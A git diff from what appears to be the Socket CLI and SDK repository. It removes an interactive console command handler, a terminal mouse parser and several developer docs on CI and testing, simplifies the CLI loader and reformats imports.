addMessage: (textOrMessage: string | ConsoleMessage) => void, - ) => { - try { - // Special demo commands. - if (command.trim() === 'demo diff') { - addMessage(`${colors.cyan('→')} Demo: Socket optimize preview`) - addMessage('') - - // Simulate package.json before optimization. - const beforePackageJson = `{ - "name": "my-app", - "version": "1.0.0", - "dependencies": { - "lodash": "^4.17.21", - "moment": "^2.29.4", - "chalk": "^4.1.2" - } -}` - - // Simulate package.json after optimization. - const afterPackageJson = `{ - "name": "my-app", - "version": "1.0.0", - "dependencies": { - "lodash-es": "^4.17.21", - "date-fns": "^3.0.0", - "@socketsecurity/registry#chalk": "^5.3.0" - } -}` - - const diffLines = createFileDiff(beforePackageJson, afterPackageJson) - - // Add message with diff. - addMessage({ - diff: diffLines, - text: '📦 package.json', - timestamp: new Date(), - }) - - addMessage('') - addMessage({ - dimmed: true, - text: ` ${colors.dim('lodash → lodash-es (tree-shakeable, saves ~45KB)')}`, - timestamp: new Date(), - }) - addMessage({ - dimmed: true, - text: ` ${colors.dim('moment → date-fns (smaller bundle, better tree-shaking)')}`, - timestamp: new Date(), - }) - addMessage({ - dimmed: true, - text: ` ${colors.dim('chalk → @socketsecurity/registry#chalk (Socket registry, verified safe)')}`, - timestamp: new Date(), - }) - addMessage('') - addMessage(`${colors.green('✓')} Demo completed`) - addMessage('') - return - } - - // Parse command. - const args = command.trim().split(/\s+/) - if (args.length === 0) { - return - } - - const firstArg = args[0]! - - // Determine if this is a socket command or console command. - const socketCommands = [ - 'analytics', - 'audit-log', - 'ci', - 'config', - 'fix', - 'install', - 'login', - 'logout', - 'manifest', - 'npm', - 'npx', - 'optimize', - 'organization', - 'package', - 'patch', - 'pip', - 'pnpm', - 'repository', - 'scan', - 'threat-feed', - 'uninstall', - 'whoami', - 'wrapper', - 'yarn', - ] - - // Common console commands that should execute directly. - const consoleCommands = [ - 'ls', - 'pwd', - 'cd', - 'echo', - 'cat', - 'grep', - 'find', - 'ps', - 'top', - 'kill', - 'env', - 'export', - 'alias', - 'history', - 'clear', - 'exit', - 'mkdir', - 'rm', - 'cp', - 'mv', - 'touch', - 'chmod', - 'chown', - 'which', - 'curl', - 'wget', - 'git', - 'node', - 'npm', - 'pnpm', - 'yarn', - ] - - let isSocketCommand = socketCommands.includes(firstArg) - const isConsoleCommand = consoleCommands.includes(firstArg) - - // If not a known command, try AI parsing for natural language. - if (!isSocketCommand && !isConsoleCommand) { - try { - const intent = await parseIntent(command) - // Only use AI if confidence is high. - if (intent && intent.confidence > 0.6) { - addMessage( - `${colors.blue('ℹ')} Interpreted as: ${intent.explanation} (${Math.round(intent.confidence * 100)}% confident)`, - ) - isSocketCommand = true - // Use AI-parsed command. - args.length = 0 - args.push(...intent.command) - } - } catch (_e) { - // AI parsing failed, continue with direct command. - } - } - - if (isSocketCommand) { - // Execute as socket command. - addMessage(`${colors.cyan('→')} Executing: socket ${args.join(' ')}`) - - const result = await spawn('socket', args, { - cwd: process.cwd(), - stdio: 'pipe', - }) - - // Add stdout output. - if (result.stdout) { - const lines = result.stdout?.toString().trim().split('\n') ?? [] - for (const line of lines) { - addMessage(line) - } - } - - // Add stderr output. - if (result.stderr) { - const lines = ( - typeof result.stderr === 'string' - ? result.stderr - : result.stderr.toString() - ) - .trim() - .split('\n') - for (const line of lines) { - addMessage(`${colors.red('✗')} ${line}`) - } - } - - if (result.code !== 0) { - addMessage( - `${colors.red('✗')} Command failed with exit code ${result.code}`, - ) - } else { - addMessage(`${colors.green('✓')} Command completed successfully`) - } - } else { - // Execute as console command (ls, pwd, etc). - addMessage(`${colors.cyan('→')} Executing: ${command}`) - - const result = await spawn(firstArg, args.slice(1), { - cwd: process.cwd(), - stdio: 'pipe', - }) - - // Add stdout output. - if (result.stdout) { - const lines = result.stdout?.toString().trim().split('\n') ?? [] - for (const line of lines) { - addMessage(line) - } - } - - // Add stderr output. - if (result.stderr) { - const lines = ( - typeof result.stderr === 'string' - ? result.stderr - : result.stderr.toString() - ) - .trim() - .split('\n') - for (const line of lines) { - addMessage(`${colors.red('✗')} ${line}`) - } - } - - if (result.code !== 0) { - addMessage( - `${colors.red('✗')} Command failed with exit code ${result.code}`, - ) - } else { - addMessage(`${colors.green('✓')} Command completed`) - } - } - - // Add spacing after command output. - addMessage('') - } catch (e) { - addMessage( - `${colors.red('✗')} Error executing command: ${(e as Error).message}`, - ) - addMessage('') - } - } - - // Render the interactive console with Ctrl+C handling disabled (we handle it ourselves). - const renderInstance = render( - createElement(InteractiveConsoleApp, { - ...versionInfo, - onCommand: handleCommand, - }), - { - exitOnCtrlC: false, - patchConsole: false, - debug: false, - }, - ) - - // Wait for exit. - try { - await renderInstance.waitUntilExit() - } finally { - renderInstance.unmount() - // Restore terminal mode and show cursor and exit alternate screen. - restoreTerminalMode() - process.stdout.write('\x1B[?25h\x1B[?1049l') - } -} diff --git a/packages/cli/src/commands/console/mouse-handler.mts b/packages/cli/src/commands/console/mouse-handler.mts deleted file mode 100644 index 689b869b3..000000000 --- a/packages/cli/src/commands/console/mouse-handler.mts +++ /dev/null @@ -1,79 +0,0 @@ -/** - * @fileoverview Mouse event handling for raw mode terminal input. - * - * Parses ANSI mouse tracking escape sequences and provides click detection. - * Supports SGR (Select Graphic Rendition) mouse mode encoding. - */ - -export interface MouseEvent { - button: number - x: number - y: number - type: 'down' | 'up' | 'move' - shift: boolean - alt: boolean - ctrl: boolean -} - -/** - * Parse SGR mouse mode escape sequence. - * Format: \x1b[M or \x1b[m - * With modifiers (SGR extended): shift adds 4, alt adds 8, ctrl adds 16. - * Example: \x1b[<0;10;5;M for left click at column 10, row 5. - * Example: \x1b[<4;10;5;M for shift+left click (button 0+4 for shift). - */ -export function parseMouseEvent(sequence: string): MouseEvent | null { - // Match SGR format: \x1b[M/m. - const match = sequence.match(/\x1b\[<(\d+);(\d+);(\d+);?[Mm]/) - if (!match) { - return null - } - - const button = Number.parseInt(match[1]!, 10) - const x = Number.parseInt(match[2]!, 10) - const y = Number.parseInt(match[3]!, 10) - - // Extract modifiers from button code (SGR extended format). - // Shift = 4, Alt = 8, Ctrl = 16. - const shift = (button & 4) !== 0 - const alt = (button & 8) !== 0 - const ctrl = (button & 16) !== 0 - - // Determine event type based on button code. - // Button 64+ indicates movement, 96+ indicates release. - let type: 'down' | 'up' | 'move' = 'down' - if (button >= 96) { - type = 'up' - } else if (button >= 64) { - type = 'move' - } - - return { - alt, - button: button % 64, - ctrl, - shift, - type, - x, - y, - } -} - -/** - * Check if a click occurred within a given box region. - */ -export function isClickInRegion( - mouseEvent: MouseEvent, - x: number, - y: number, - width: number, - height: number, -): boolean { - return ( - mouseEvent.type === 'down' && - mouseEvent.x >= x && - mouseEvent.x < x + width && - mouseEvent.y >= y && - mouseEvent.y < y + height - ) -} diff --git a/packages/cli/src/commands/json/output-cmd-json.mts b/packages/cli/src/commands/json/output-cmd-json.mts index d12f2d8aa..2ebf62142 100644 --- a/packages/cli/src/commands/json/output-cmd-json.mts +++ b/packages/cli/src/commands/json/output-cmd-json.mts @@ -1,7 +1,10 @@ import { existsSync } from 'node:fs' import path from 'node:path' -import { safeReadFileSync, safeStatsSync } from '@socketsecurity/lib-internal/fs' +import { + safeReadFileSync, + safeStatsSync, +} from '@socketsecurity/lib-internal/fs' import { getDefaultLogger } from '@socketsecurity/lib-internal/logger' import { REDACTED } from '../../constants/cli.mts' diff --git a/packages/cli/src/commands/login/attempt-login.mts b/packages/cli/src/commands/login/attempt-login.mts index 11f3c5ab4..41d9afcb6 100644 --- a/packages/cli/src/commands/login/attempt-login.mts +++ b/packages/cli/src/commands/login/attempt-login.mts @@ -1,7 +1,11 @@ import { joinAnd } from '@socketsecurity/lib-internal/arrays' import { SOCKET_PUBLIC_API_TOKEN } from '@socketsecurity/lib-internal/constants/socket' import { getDefaultLogger } from '@socketsecurity/lib-internal/logger' -import { confirm, password, select } from '@socketsecurity/lib-internal/stdio/prompts' +import { + confirm, + password, + select, +} from '@socketsecurity/lib-internal/stdio/prompts' import { applyLogin } from './apply-login.mts' import { diff --git a/packages/cli/src/index.mts b/packages/cli/src/index.mts index 76c6e60c1..6ce3cfc58 100644 --- a/packages/cli/src/index.mts +++ b/packages/cli/src/index.mts @@ -1,48 +1,14 @@ /** - * Brotli-compressed CLI loader. - * Decompresses dist/cli.js.bz and executes it. - * - * This loader allows the CLI to be distributed as a compressed file, - * reducing npm package size from ~13MB to ~1.7MB. + * CLI loader entry point. + * Loads and executes the CLI bundle. * * Note: Written as CommonJS to avoid import.meta issues. Shebang added by esbuild banner. */ // CommonJS globals are available since we're outputting to CJS format. -const { readFileSync, unlinkSync, writeFileSync } = require('node:fs') -const Module = require('node:module') const path = require('node:path') -const { brotliDecompressSync } = require('node:zlib') - -const { safeMkdirSync } = require('@socketsecurity/lib/fs') - -const cliBzPath = path.join(__dirname, 'cli.js.bz') -const buildPath = path.join(__dirname, '..', 'build') - -// Read and decompress. -const compressed = readFileSync(cliBzPath) -const decompressed = brotliDecompressSync(compressed) - -// Ensure build/ directory exists. -safeMkdirSync(buildPath, { recursive: true }) - -// Write to build/ directory (gitignored, local to package). -const tempCliPath = path.join(buildPath, `cli-runtime-${process.pid}.js`) -writeFileSync(tempCliPath, decompressed) -try { - // Create a new module and set its paths to resolve from the CLI package directory. - const cliModule = new Module(tempCliPath, module.parent) - cliModule.filename = tempCliPath - cliModule.paths = Module._nodeModulePaths(__dirname) +const cliPath = path.join(__dirname, 'cli.js') - // Load and execute the CLI module. - cliModule._compile(decompressed.toString('utf-8'), tempCliPath) -} finally { - // Clean up temp file. - try { - unlinkSync(tempCliPath) - } catch { - // Ignore cleanup errors. - } -} +// Load and execute the CLI module. +require(cliPath) diff --git a/packages/cli/src/utils/spawn/spawn-node.mts b/packages/cli/src/utils/spawn/spawn-node.mts index f4af3f962..ad0d75543 100644 --- a/packages/cli/src/utils/spawn/spawn-node.mts +++ b/packages/cli/src/utils/spawn/spawn-node.mts @@ -21,7 +21,7 @@ import { which } from '@socketsecurity/lib/bin' import { getExecPath } from '@socketsecurity/lib/constants/node' -import { spawn } from '@socketsecurity/lib/spawn' +import { spawn, spawnSync } from '@socketsecurity/lib/spawn' import { ensureIpcInStdio } from '../../shadow/stdio-ipc.mjs' import { sendBootstrapHandshake } from '../sea/boot.mjs' @@ -161,6 +161,8 @@ export async function findSystemNodejs(): Promise { * * Note: IPC handshake is not supported in synchronous mode, * so this should only be used when IPC is not required. + * Also note that SEA system Node.js detection is not available + * in synchronous mode - falls back to getExecPath(). * * @param args - Arguments to pass to Node.js * @param options - Spawn options (ipc field is ignored) @@ -170,7 +172,6 @@ export function spawnNodeSync( args: string[] | readonly string[], options?: Omit, ): ReturnType { - const { spawnSync } = require('@socketsecurity/lib/spawn') - const nodePath = getNodeExecutablePath() + const nodePath = getExecPath() return spawnSync(nodePath, args, options) } diff --git a/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts b/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts index 6d947b4b7..9cebaecaf 100644 --- a/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts +++ b/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts @@ -123,7 +123,9 @@ describe('ghsa-tracker', () => { describe('saveGhsaTracker', () => { it('saves tracker to file', async () => { - const { safeMkdir, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { safeMkdir, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const tracker: GhsaTracker = { version: 1, fixed: [ @@ -149,7 +151,9 @@ describe('ghsa-tracker', () => { describe('markGhsaFixed', () => { it('adds new GHSA fix record', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [], @@ -176,7 +180,9 @@ describe('ghsa-tracker', () => { }) it('replaces existing GHSA fix record', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [ @@ -213,7 +219,9 @@ describe('ghsa-tracker', () => { }) it('sorts records by fixedAt descending', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [ diff --git a/packages/sdk/docs/dev/ci-testing.md b/packages/sdk/docs/dev/ci-testing.md deleted file mode 100644 index 52f56d588..000000000 --- a/packages/sdk/docs/dev/ci-testing.md +++ /dev/null @@ -1,137 +0,0 @@ -# CI Testing - -This project uses socket-registry's centralized CI testing infrastructure. - -## Critical Requirements - -**🚨 MANDATORY:** Use full commit SHA, NOT `@main` - -```yaml -uses: SocketDev/socket-registry/.github/workflows/ci.yml@662bbcab1b7533e24ba8e3446cffd8a7e5f7617e # main -``` - -Get SHA: `cd /path/to/socket-registry && git rev-parse main` - -## Workflow Configuration - -Located at `.github/workflows/test.yml`: - -```yaml -jobs: - test: - uses: SocketDev/socket-registry/.github/workflows/ci.yml@ # main - with: - setup-script: 'pnpm run build' - node-versions: '[20, 22, 24]' - os-versions: '["ubuntu-latest", "windows-latest"]' - test-script: 'pnpm run test-ci' - lint-script: 'pnpm run check:lint' - type-check-script: 'pnpm run check:tsc' - timeout-minutes: 10 -``` - -## Key Features - -- Matrix testing across Node.js versions and OSes -- Parallel execution (lint, type-check, test, coverage) -- Configurable scripts, timeouts, and artifacts -- Memory optimization (8GB CI, 4GB local) -- Cross-platform compatibility - -## Configuration Options - -| Parameter | Description | Default | -|-----------|-------------|---------| -| `node-versions` | Node.js versions array | `[20, 22, 24]` | -| `os-versions` | Operating systems | `["ubuntu-latest", "windows-latest"]` | -| `test-script` | Test command | `pnpm run test-ci` | -| `setup-script` | Pre-test setup | `''` | -| `timeout-minutes` | Job timeout | `10` | -| `upload-artifacts` | Upload test artifacts | `false` | -| `fail-fast` | Cancel on failure | `true` | - -## Test Scripts - -**Custom test runner** (`scripts/test.mjs`): -- Glob pattern expansion -- Force flag support -- Memory optimization (auto heap size) -- Cross-platform support (Windows `.cmd` handling) - -**Usage:** -```bash -# Run all tests -pnpm run test:run - -# Run with force flag -node scripts/test.mjs --force - -# Run specific pattern -node scripts/test.mjs test/unit/*.test.mts -``` - -## Memory Configuration - -Auto-configured by test runner: -- CI: 8GB heap (`--max-old-space-size=8192`) -- Local: 4GB heap (`--max-old-space-size=4096`) -- Semi-space: 512MB for GC - -Defined in: -1. `scripts/test.mjs` (custom runner) -2. `.env.test` (vitest direct) -3. `vitest.config.mts` (pool config) - -## Environment Variables - -| Variable | Purpose | -|----------|---------| -| `CI` | Detect CI environment | -| `FORCE_TEST` | Force all tests | -| `PRE_COMMIT` | Detect pre-commit hook | -| `NODE_OPTIONS` | Node.js runtime options | - -## Local Testing - -```bash -# Full suite -pnpm test - -# With coverage -pnpm run test:unit:coverage - -# Coverage percentage -pnpm run coverage:percent - -# Custom runner -pnpm run test:run -``` - -## Troubleshooting - -**Out of memory:** -1. Check `NODE_OPTIONS` in `.env.test` -2. Verify vitest pool configuration -3. Reduce `max-parallel` in workflow - -**Windows issues:** -1. Ensure paths use `path.join()` -2. Check `.cmd` file handling -3. Verify `shell: true` for Windows spawns - -**Timeouts:** -1. Increase `timeout-minutes` -2. Check `testTimeout` in `vitest.config.mts` -3. Review individual test timeouts - -## Best Practices - -1. **Use centralized CI workflow** with full SHA -2. **Set appropriate timeouts** for test suite size -3. **Optimize memory** for large suites (sequential execution, single fork) -4. **Enable debug mode** for troubleshooting: `debug: '1'` - -## See Also - -- [Testing Utilities](./testing.md) - Test helpers documentation -- socket-registry CI workflow: `SocketDev/socket-registry/.github/workflows/ci.yml` diff --git a/packages/sdk/docs/dev/scripts.md b/packages/sdk/docs/dev/scripts.md deleted file mode 100644 index ba6ceda47..000000000 --- a/packages/sdk/docs/dev/scripts.md +++ /dev/null @@ -1,181 +0,0 @@ -# Script Organization - -Complex scripts are extracted to Node.js `.mjs` files in `scripts/` for better maintainability and cross-platform compatibility. - -## Benefits - -- **Customization**: Flags, conditional logic, complex workflows -- **Maintainability**: Easier to read, test, and modify -- **Cross-platform**: Consistent across Windows, macOS, Linux -- **Error handling**: Proper exit codes and messages -- **Reusability**: Shared utilities - -## Directory Structure - -``` -scripts/ -├── utils/ -│ ├── run-command.mjs # Command execution -│ └── path-helpers.mjs # Path utilities -├── build.mjs # Build orchestration -├── clean.mjs # Clean artifacts -├── check.mjs # Quality checks -├── lint-fix.mjs # Auto-fix linting -├── coverage.mjs # Coverage collection -└── test.mjs # Test runner -``` - -## Core Utilities - -### `run-command.mjs` - -```javascript -import { runCommand, runSequence, runParallel } from './utils/run-command.mjs' - -// Single command -await runCommand('rollup', ['-c', 'rollup.config.mjs']) - -// Sequential -await runSequence([ - { command: 'pnpm', args: ['run', 'clean'] }, - { command: 'rollup', args: ['-c'] } -]) - -// Parallel -await runParallel([ - { command: 'pnpm', args: ['run', 'lint'] }, - { command: 'pnpm', args: ['run', 'check:tsc'] } -]) -``` - -## Main Scripts - -### `build.mjs` - -Build with optional flags: -- `--src-only`: Build source only -- `--types-only`: Build types only -- `--watch`: Watch mode with incremental builds - -```json -{ - "scripts": { - "build": "node scripts/build.mjs", - "build:dist:src": "node scripts/build.mjs --src-only" - } -} -``` - -### `clean.mjs` - -Clean artifacts with granular control: -- `--cache`: Cache directories only -- `--coverage`: Coverage reports only -- `--dist`: Dist directory only -- `--all`: Everything (default) - -```json -{ - "scripts": { - "clean": "node scripts/clean.mjs", - "clean:cache": "node scripts/clean.mjs --cache" - } -} -``` - -### `check.mjs` - -Run quality checks in parallel: -- TypeScript type checking -- ESLint linting - -```json -{ - "scripts": { - "check": "node scripts/check.mjs" - } -} -``` - -### `lint-fix.mjs` - -Run linters with auto-fix sequentially: -1. oxlint -2. biome -3. eslint - -```json -{ - "scripts": { - "fix": "node scripts/lint-fix.mjs" - } -} -``` - -## Before vs After - -### Before (Inline Scripts) -```json -{ - "scripts": { - "build:dist": "pnpm run build:dist:src && pnpm run build:dist:types", - "clean": "run-s -c clean:*", - "lint:fix": "run-s -c lint:fix:oxlint lint:fix:biome lint:fix:eslint" - } -} -``` - -**Issues:** Hard to customize, limited error handling, verbose, difficult to test - -### After (Node.js Scripts) -```json -{ - "scripts": { - "build": "node scripts/build.mjs", - "build:dist:src": "node scripts/build.mjs --src-only", - "clean": "node scripts/clean.mjs", - "fix": "node scripts/lint-fix.mjs" - } -} -``` - -**Benefits:** Easy flags, proper error handling, cross-platform, testable - -## Best Practices - -1. **Meaningful flags**: `--src-only`, not `-s` -2. **JSDoc comments**: Document parameters -3. **Graceful errors**: Proper exit codes -4. **Log progress**: Use logger -5. **Focused scripts**: One responsibility -6. **Composability**: Scripts can call scripts -7. **Avoid shell: true**: Pass args as arrays -8. **Test edge cases**: Missing files, wrong flags - -## Common Patterns - -**Conditional execution:** -```javascript -if (condition) await runCommand('cmd', ['arg']) -``` - -**Sequential with early exit:** -```javascript -const exitCode = await runSequence([...]) -if (exitCode !== 0) process.exitCode = exitCode -``` - -**Parallel execution:** -```javascript -const exitCodes = await runParallel([...]) -const failed = exitCodes.some(code => code !== 0) -``` - -## Migration Steps - -1. Copy `scripts/utils/` to your project -2. Identify complex scripts in `package.json` -3. Create `.mjs` files for each -4. Update `package.json` to reference new scripts -5. Test all scripts -6. Update CI/CD if needed diff --git a/packages/sdk/docs/dev/testing.md b/packages/sdk/docs/dev/testing.md deleted file mode 100644 index 67b7c34a9..000000000 --- a/packages/sdk/docs/dev/testing.md +++ /dev/null @@ -1,464 +0,0 @@ -# Testing Guide - -Comprehensive guide for testing Socket SDK - includes setup, utilities, patterns, and best practices. - -## Quick Start - -| Task | Command | -|------|---------| -| **Run all tests** | `pnpm test` | -| **Run specific file** | `pnpm run test:run path/to/file.test.mts` | -| **Run with coverage** | `pnpm run cover` | -| **Coverage percentage** | `pnpm run coverage:percent` | - -```typescript -import { describe, expect, it } from 'vitest' -import { setupTestClient } from './utils/environment.mts' -import nock from 'nock' - -describe('SocketSdk - Feature Name', () => { - const getClient = setupTestClient('test-api-token', { retries: 0 }) - - it('should do something specific', async () => { - // Arrange: Setup mock - nock('https://api.socket.dev') - .get('/v0/endpoint') - .reply(200, { ok: true }) - - // Act: Call method - const result = await getClient().method() - - // Assert: Check result - expect(result.success).toBe(true) - if (result.success) { - expect(result.data.ok).toBe(true) - } - }) -}) -``` - ---- - -## Test Helpers - -**Location:** `test/utils/environment.mts` - -| Helper | Use Case | Auto Cleanup | -|--------|----------|--------------| -| **`setupTestClient()`** | Most tests - combines nock + client | ✓ | -| **`setupTestEnvironment()`** | Custom SDK instances needed | ✓ | -| **`createTestClient()`** | Unit tests, no HTTP mocking | ✗ | -| **`isCoverageMode`** | Detect coverage mode | N/A | - -### `setupTestClient(token?, options?)` - RECOMMENDED - -Combines nock setup and client creation with automatic cleanup. - -```typescript -const getClient = setupTestClient('test-token', { retries: 0 }) -// ✓ Automatic nock lifecycle -// ✓ Fresh client per test -// ✓ No cleanup boilerplate -``` - -**When to use:** 90% of SDK tests - -### `setupTestEnvironment()` - -Nock environment setup without client creation. - -```typescript -setupTestEnvironment() -const client = new SocketSdk('custom-config') -``` - -**When to use:** Manual control over client creation needed - -### `createTestClient(token?, options?)` - -Client creation without automatic environment setup. - -```typescript -const client = createTestClient('test-token', { retries: 0 }) -``` - -**When to use:** Unit tests without HTTP mocking - -### `isCoverageMode` - -Boolean flag for coverage detection. - -```typescript -import { isCoverageMode } from './utils/environment.mts' - -if (isCoverageMode) { - // Adjust test behavior -} -``` - -### Helper Selection Guide - -``` -What do you need? -│ -├─ Fresh SDK instance per test with HTTP mocking? -│ └─ ✓ setupTestClient() -│ -├─ Custom SDK configuration with HTTP mocking? -│ └─ ✓ setupTestEnvironment() + new SocketSdk() -│ -├─ Unit test without HTTP mocking? -│ └─ ✓ createTestClient() -│ -└─ Testing SDK initialization? - └─ ✓ createTestClient() or new SocketSdk() -``` - ---- - -## Public Testing Utilities - -Exported from `@socketsecurity/sdk/testing` for external use. - -### Response Builders - -```typescript -import { - mockSuccessResponse, - mockErrorResponse, - mockApiErrorBody, - mockSdkError -} from '@socketsecurity/sdk/testing' - -// Success response -mockSuccessResponse({ id: '123' }, 200) -// → { success: true, status: 200, data: { id: '123' } } - -// Error response -mockErrorResponse('Not found', 404) -// → { success: false, status: 404, error: 'Not found' } - -// API error body (for nock) -mockApiErrorBody('Repository not found') -// → { error: { message: 'Repository not found' } } - -// Common errors -mockSdkError('NOT_FOUND') // status: 404 -mockSdkError('UNAUTHORIZED') // status: 401 -mockSdkError('SERVER_ERROR') // status: 500 -``` - -### Fixtures - -```typescript -import { fixtures } from '@socketsecurity/sdk/testing' - -// Organizations -fixtures.organizations.basic // { id, name, plan } -fixtures.organizations.full // + timestamps - -// Repositories -fixtures.repositories.basic // { id, name, archived, default_branch } -fixtures.repositories.full // + homepage, visibility, timestamps - -// Scans -fixtures.scans.pending // { id, status: 'pending' } -fixtures.scans.completed // + completed_at -fixtures.scans.withIssues // issues_found > 0 - -// Packages -fixtures.packages.safe // { score: 95 } -fixtures.packages.vulnerable // { score: 45 } -fixtures.packages.malware // { score: 0 } -``` - -### Type Guards - -```typescript -import { isSuccessResult, isErrorResult } from '@socketsecurity/sdk/testing' - -if (isSuccessResult(result)) { - console.log(result.data) // Type-safe access -} - -if (isErrorResult(result)) { - console.log(result.error) // Type-safe access -} -``` - ---- - -## Test Structure & Organization - -### File Organization - -``` -test/ -├── *.test.mts # Test files -└── utils/ # Shared utilities - ├── environment.mts # Test helpers - └── README.md # Utilities documentation -``` - -### Naming Conventions - -| Element | Convention | Example | -|---------|-----------|---------| -| **Files** | `feature-name.test.mts` | `socket-sdk-quota.test.mts` | -| **Describes** | `'SocketSdk - Feature Name'` | `'SocketSdk - Quota Management'` | -| **Tests** | `'should do something specific'` | `'should fetch quota successfully'` | - -❌ **Avoid:** `test1.test.mts`, `'tests'`, `'it works'` - ---- - -## Usage Patterns - -### Basic SDK Test - -```typescript -import { setupTestClient } from './utils/environment.mts' -import nock from 'nock' - -describe('SocketSdk - Quota', () => { - const getClient = setupTestClient() - - it('should fetch quota successfully', async () => { - nock('https://api.socket.dev') - .get('/v0/quota') - .reply(200, { quota: 1000 }) - - const result = await getClient().getQuota() - expect(result.success).toBe(true) - if (result.success) { - expect(result.data.quota).toBe(1000) - } - }) - - it('should handle 401 errors', async () => { - nock('https://api.socket.dev') - .get('/v0/quota') - .reply(401, { error: { message: 'Unauthorized' } }) - - const result = await getClient().getQuota() - expect(result.success).toBe(false) - if (!result.success) { - expect(result.status).toBe(401) - } - }) -}) -``` - -### Custom SDK Configuration - -```typescript -const getClient = setupTestClient('test-token', { - baseUrl: 'https://custom.api.socket.dev', - timeout: 10000, - userAgent: 'Test/1.0' -}) -``` - -### Multiple API Calls - -```typescript -it('should handle multiple nock mocks', async () => { - nock('https://api.socket.dev') - .get('/v0/orgs/test-org/repos') - .reply(200, { repos: [...] }) - .get('/v0/orgs/test-org/repos/repo1') - .reply(200, { name: 'repo1' }) - - const repoList = await getClient().getOrgRepoList('test-org') - const repo1 = await getClient().getOrgRepo('test-org', 'repo1') - - expect(repoList.success).toBe(true) - expect(repo1.success).toBe(true) -}) -``` - -### Error Handling - -```typescript -describe('Error Handling', () => { - const getClient = setupTestClient() - - it('should handle 404 errors', async () => { - nock('https://api.socket.dev') - .get('/v0/nonexistent') - .reply(404, { error: { message: 'Not found' } }) - - const result = await getClient().getData() - expect(result.success).toBe(false) - if (!result.success) { - expect(result.status).toBe(404) - } - }) - - it('should handle network errors', async () => { - nock('https://api.socket.dev') - .get('/v0/endpoint') - .replyWithError('ECONNREFUSED') - - await expect(getClient().getData()).rejects.toThrow() - }) -}) -``` - -### Unit Test with Fixtures - -```typescript -import { mockSuccessResponse, fixtures } from '@socketsecurity/sdk/testing' - -it('should fetch repository', async () => { - const mockSdk = { - getOrgRepo: vi.fn().mockResolvedValue( - mockSuccessResponse(fixtures.repositories.full) - ) - } - - const result = await mockSdk.getOrgRepo('org', 'repo') - expect(result.success).toBe(true) -}) -``` - -### Integration Test with Nock - -```typescript -import nock from 'nock' -import { SocketSdk } from '@socketsecurity/sdk' -import { mockApiErrorBody } from '@socketsecurity/sdk/testing' - -it('should handle API errors', async () => { - nock('https://api.socket.dev') - .get('/v0/repo/org/repo') - .reply(404, mockApiErrorBody('Not found')) - - const client = new SocketSdk('test-token') - const result = await client.getOrgRepo('org', 'repo') - - expect(result.success).toBe(false) -}) -``` - ---- - -## Best Practices - -### 1. Always Use Helper Functions - -```typescript -✓ const getClient = setupTestClient() -✗ beforeEach(() => { nock.restore(); nock.activate() }) -``` - -### 2. Type-Safe Result Checking - -```typescript -✓ if (result.success) { - expect(result.data.quota).toBe(1000) // TypeScript knows data exists - } - -✗ expect(result.data.quota).toBe(1000) // TypeScript error -``` - -### 3. Test Both Success and Error Paths - -```typescript -describe('Complete Coverage', () => { - it('should handle success', async () => { /* ... */ }) - it('should handle 401 error', async () => { /* ... */ }) - it('should handle network error', async () => { /* ... */ }) -}) -``` - -### 4. Use Fast Test Config - -```typescript -✓ const getClient = setupTestClient('test-token', { retries: 0 }) -✗ const getClient = setupTestClient('test-token', { retries: 3, retryDelay: 1000 }) -``` - -### 5. Descriptive Naming - -| Type | Good | Bad | -|------|------|-----| -| **File** | `socket-sdk-quota.test.mts` | `test1.test.mts` | -| **Describe** | `'SocketSdk - Quota Management'` | `'tests'` | -| **Test** | `'should fetch quota successfully'` | `'it works'` | - -### 6. Specific Assertions - -```typescript -✓ expect(result.data.quota).toBe(42) -✓ expect(result.data.items).toHaveLength(3) -✓ expect(result.data.name).toContain('value') - -✗ expect(result.data).toBeTruthy() -✗ expect(result.data).toBeDefined() -``` - -### 7. Nock Mocking Pattern - -```typescript -nock('https://api.socket.dev') - .get('/v0/endpoint') - .reply(200, { data: 'value' }) - -// Auto cleanup via setupTestClient() -``` - ---- - -## Coverage Mode Behavior - -When running with `--coverage`: - -| Behavior | Regular Mode | Coverage Mode | -|----------|--------------|---------------| -| **Nock validation** | Strict | Relaxed | -| **Pending mocks** | Throw errors | No errors | -| **Cleanup** | Standard | Aggressive (`abortPendingRequests`) | - -### Skip Tests in Coverage Mode - -```typescript -it.skipIf(isCoverageMode)('should test advanced feature', async () => { - // This test only runs in regular mode -}) -``` - ---- - -## Fast Test Configuration - -`FAST_TEST_CONFIG` is automatically applied by test helpers: - -```typescript -{ - retries: 0, // No retries - retryDelay: 0, // No delay - timeout: 5000 // 5 second timeout -} -``` - ---- - -## Key Benefits - -- ✓ **Consistent nock lifecycle** - No forgotten cleanup -- ✓ **Fast test execution** - Optimized timeouts and retries -- ✓ **Type-safe results** - Full TypeScript support -- ✓ **Coverage mode handling** - Automatic adjustments -- ✓ **Reduced boilerplate** - 5-10 lines saved per test file -- ✓ **Rich fixtures** - Pre-built test data -- ✓ **Flexible mocking** - Response builders for any scenario - ---- - -## See Also - -- [CI Testing](./ci-testing.md) - Continuous integration setup -- [Scripts](./scripts.md) - Script organization patterns -- [API Reference](../api-reference.md) - Complete API documentation -- [Test Utils README](../../test/utils/README.md) - Detailed helper docs diff --git a/packages/sdk/docs/incremental-builds.md b/packages/sdk/docs/incremental-builds.md deleted file mode 100644 index 1563323a9..000000000 --- a/packages/sdk/docs/incremental-builds.md +++ /dev/null @@ -1,142 +0,0 @@ -# Incremental Builds - -Guide to optimizing build performance during development. - -## Quick Start - -```bash -# Development mode with incremental builds (68% faster) -pnpm build --watch - -# Production build (full rebuild) -pnpm build -``` - -## Performance Comparison - -| Build Type | Time | Use Case | -|------------|------|----------| 